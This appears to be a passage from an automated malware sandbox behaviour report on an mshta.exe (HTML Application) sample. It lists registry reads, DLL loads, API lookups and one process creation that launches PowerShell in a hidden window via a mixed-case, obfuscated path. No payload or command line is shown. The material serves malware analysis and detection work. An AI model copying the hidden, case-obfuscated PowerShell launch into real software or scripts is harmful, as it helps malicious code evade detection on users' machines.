| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Main\FeatureControl | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl | - |
|
6 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl | - |
|
8 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_CSS_DATA_RESPECTS_XSS_ZONE_SETTING_KB912120 | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_CSS_DATA_RESPECTS_XSS_ZONE_SETTING_KB912120 | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl | - |
|
8 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl | - |
|
6 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_EXTERNAL_STYLE_SHEET_FIX_FOR_SMARTNAVIGATION_KB926131 | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_EXTERNAL_STYLE_SHEET_FIX_FOR_SMARTNAVIGATION_KB926131 | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ARIA_SUPPORT | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ARIA_SUPPORT | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_LEGACY_DISPPARAMS | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_LEGACY_DISPPARAMS | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_PRIVATE_FONT_SETTING | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_PRIVATE_FONT_SETTING | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_CSS_SHOW_HIDE_EVENTS | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_CSS_SHOW_HIDE_EVENTS | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DISPLAY_NODE_ADVISE_KB833311 | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DISPLAY_NODE_ADVISE_KB833311 | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ALLOW_EXPANDURI_BYPASS | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ALLOW_EXPANDURI_BYPASS | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BODY_SIZE_IN_EDITABLE_IFRAME_KB943245 | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BODY_SIZE_IN_EDITABLE_IFRAME_KB943245 | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DATABINDING_SUPPORT | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DATABINDING_SUPPORT | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ENFORCE_BSTR | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ENFORCE_BSTR | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ENABLE_DYNAMIC_OBJECT_CACHING | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ENABLE_DYNAMIC_OBJECT_CACHING | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl | - |
|
2 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_LEGACY_TOSTRING_IN_COMPATVIEW | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_LEGACY_TOSTRING_IN_COMPATVIEW | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl | - |
|
2 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ENABLE_OM_SCREEN_ORIGIN_DISPLAY_PIXELS | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ENABLE_OM_SCREEN_ORIGIN_DISPLAY_PIXELS | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_RESTRICT_CRASH_RECOVERY_SAVE_KB978454 | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_RESTRICT_CRASH_RECOVERY_SAVE_KB978454 | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_CLEANUP_AT_FLS | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_CLEANUP_AT_FLS | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MANAGE_SCRIPT_CIRCULAR_REFS | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MANAGE_SCRIPT_CIRCULAR_REFS | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DOCUMENT_COMPATIBLE_MODE | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DOCUMENT_COMPATIBLE_MODE | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_WEBOC_DOCUMENT_ZOOM | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_WEBOC_DOCUMENT_ZOOM | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\PageSetup | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_XSSFILTER | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_XSSFILTER | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_SHOW_FAILED_CONNECT_CONTENT_KB942615 | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_SHOW_FAILED_CONNECT_CONTENT_KB942615 | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MSHTML_AUTOLOAD_IEFRAME | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MSHTML_AUTOLOAD_IEFRAME | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MIME_TREAT_IMAGE_AS_AUTHORITATIVE | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MIME_TREAT_IMAGE_AS_AUTHORITATIVE | - |
|
1 | |
| Read Value | HKEY_CLASSES_ROOT\clsid\{25336920-03f9-11cf-8fd0-00aa00686f13}\InProcServer32 | data = C:\Windows\System32\mshtml.dll, type = REG_SZ |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer | value_name = NoFileMenu, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\PageSetup | value_name = Print_Background |
|
1 |
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\SYSteM32\windowspOweRSHeLL\V1.0\PoWErSHELL.Exe | show_window = SW_HIDE |
|
1 |
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | C:\Windows\System32\mshtml.dll | base_address = 0x7fee0880000 |
|
1 | |
| Load | comctl32.dll | base_address = 0x7fefc060000 |
|
1 | |
| Load | OLEAUT32.dll | base_address = 0x7fefde70000 |
|
1 | |
| Load | mshtml.dll | base_address = 0x7fee0880000 |
|
1 | |
| Load | OLEACC.DLL | base_address = 0x7fef22f0000 |
|
1 | |
| Load | ieframe.dll | base_address = 0x7fef2350000 |
|
2 | |
| Load | ole32.dll | base_address = 0x7fefe1c0000 |
|
1 | |
| Load | shell32.dll | base_address = 0x7fefe850000 |
|
1 | |
| Load | oleaut32.dll | base_address = 0x7fefde70000 |
|
1 | |
| Load | WININET.dll | base_address = 0x7feff5e0000 |
|
1 | |
| Get Handle | c:\windows\system32\mshta.exe | base_address = 0xff9d0000 |
|
2 | |
| Get Handle | c:\windows\system32\kernel32.dll | base_address = 0x776e0000 |
|
3 | |
| Get Handle | c:\windows\system32\advapi32.dll | base_address = 0x7feff8e0000 |
|
1 | |
| Get Handle | EXPLORER.EXE | base_address = 0x0 |
|
1 | |
| Get Handle | IEXPLORE.EXE | base_address = 0x0 |
|
1 | |
| Get Handle | c:\windows\system32\ole32.dll | base_address = 0x7fefe1c0000 |
|
1 | |
| Get Handle | mscoree.dll | base_address = 0x0 |
|
1 | |
| Get Filename | - | process_name = c:\windows\system32\mshta.exe, file_name_orig = C:\Windows\System32\mshta.exe, size = 260 |
|
4 | |
| Get Filename | C:\Windows\System32\mshtml.dll | process_name = c:\windows\system32\mshta.exe, file_name_orig = C:\Windows\System32\mshtml.dll, size = 260 |
|
1 | |
| Get Filename | c:\windows\system32\mshta.exe | process_name = c:\windows\system32\mshta.exe, file_name_orig = C:\Windows\System32\mshta.exe, size = 260 |
|
1 | |
| Get Filename | IEXPLORE.EXE | process_name = c:\windows\system32\mshta.exe, file_name_orig = C:\Windows\System32\mshta.exe, size = 261 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = HeapSetInformation, address_out = 0x776fc4a0 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = EventWrite, address_out = 0x7782b510 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = EventRegister, address_out = 0x7783cac0 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = EventUnregister, address_out = 0x77823c80 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = RegisterApplicationRestart, address_out = 0x7775f510 |
|
1 | |
| Get Address | c:\windows\system32\mshtml.dll | function = RunHTMLApplication, address_out = 0x7fee0ad5b90 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = InitializeSRWLock, address_out = 0x778384f0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = AcquireSRWLockExclusive, address_out = 0x77828020 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = AcquireSRWLockShared, address_out = 0x778254e0 |
|
1 |
